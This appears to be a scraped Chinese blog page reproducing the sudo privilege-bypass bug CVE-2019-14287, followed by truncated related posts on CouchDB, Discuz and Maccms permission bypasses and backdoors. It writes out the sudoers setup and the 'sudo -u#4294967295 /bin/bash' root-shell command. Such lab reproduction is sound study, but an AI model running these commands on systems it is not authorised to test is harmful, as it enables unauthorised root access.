PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现

猫宁!!!

参考链接:Ms08067实验室公众号

sudo 1.8.28版本之前有漏洞,很鸡肋的。

更新完kali linux,deepin截图工具失效,只能用自带的,不能划重点。

看一下sudo版本,1.8.23,centos7上操作。

设置密码1234qwer

cat /etc/passwd

vim /etc/sudoers,test ALL=(ALL,!root) /usr/bin/vim是新添加的,表示test这个用户不是root组,但

切换到test用户

显示如下

就是在冒号后面,加个感叹号之后输入whoami或者cat /etc/passwd,就可以看到执行结果。

算是一个本地提权。

原文地址:https://www.cnblogs.com/landesk/p/11689454.html

时间: 2024-10-17 03:28:04

PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现的相关文章

(CVE-2019-14287)-linux sudo root 权限绕过漏洞复现

1:查看测试机sudo版本号,确认是受影响版本. 2:创建账号test 3:进入/etc,备份一下sudoers到/root,然后修改sudoers内容,添加: test  ALL=(ALL,!root) /bin/bash 4:登录test账号, sudo -u#4294967295 /bin/bash 受影响的Sudo版本: 1.8.28之前的Sudo版本会受到影响. =======================================参考链接:https://www.sudo.w

Python 实现 Discuz论坛附件下载权限绕过漏洞

背景:最近压力有些大,想玩点游戏放松下,去Mac论坛下载,发现需要各种权限,于是蛋疼了. 所以,上网查了discuz! x3.1破解,手动替换,发现出现“链接已过期”.所以写了下面程序. 0.将下列代码复制到你的python IDE中. 1.先进网页,chrome浏览器查看网页元素,替换正则表达式内内容. 2.刷新你要下载的页面,右键复制下载链接 url = ‘你复制的链接’ 3.运行python,你的IDE里面就会打印出真实下载地址. 运行环境:python3.5 操作系统:macpro 20

利用Vulnhub复现漏洞 - Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序). 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12

Sudo提权漏洞复现

Sudo是linux的系统命令,让普通账号以root方式执行命令 正常来说如果普通用户需要用sudo,需要修改配置文件/etc/sudoers,将sudo使用权赋予该用户 而这个漏洞使得普通用户也可以绕过安全策略,执行敏感命令 漏洞影响的版本是<1.8.28 实验环境:kali 漏洞复现过程 1. 查看sudo版本 Sudo –V 2. 修改配置文件:vim/etc/sudoers 在root(ALL:ALL)ALL添加一行 Test ALL=(ALL,!root)ALL 第一个ALL表示用户可

[漏洞复现]CVE-2019-14287 sudo提权漏洞

漏洞描述 2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警.通过特定payload,用户可提升至root权限. 利用前提 sudo -v < 1.8.28 知道当前用户的密码 当前用户存在于sudo权限列表 漏洞复现 [email protected]:~$ id uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),

Couchdb垂直权限绕过到命令执行

0x00couchdb简介 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛. 0x01两个漏洞的关系及原理 CVE-2017-12635垂直越权: CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的.这个漏洞可以让任意用户创建管理员,属于

2019-10-16,sudo提权漏洞(CVE-2019-14287)实现

sudo是linux系统命令,让普通账号以root身份执行某些命令,比如,安装软件,查看某些配置文件,关机,重启等,如果普通用户需要使用sudo需要修改配置文件,/etc/sudoers,将sudo使用权限赋予该用户 sudo提权漏洞,是一个安全策略绕过问题,去执行某些敏感的命令,cve编号是CVE-2019-14287,影响版本是 sudo版本<1.8.28 漏洞复现1,查看sudo版本,命令sudo -V 2,修改配置文件,vim /etc/sudoers, root ALL(ALL:ALL

10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现

Maccms后门分析 maccms网站基于php+mysql的系统,易用性.功能良好等优点,用途范围广 打开源码,extend\Qcloud\Sms\Sms.php.extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 二者代码相同) <?php error_reporting(E_ERROR);//报错 @ini_set('display_errors','Off'); @ini_set('max_executio

sudo 提权漏洞(CVE-2019-14287)复现 (10.16 第二十二天)

sudo是Linux系统命令,让普通账号以root身份去执行某些命令,比,安装软件.查看某些配置文件.关机.重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权赋予该账号 sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 漏洞复现过程 1.查看版本:sudo -V 2.修改配置文件:vim/etc/sudoers在root ALL=(ALL:ALL)ALL 下面添加一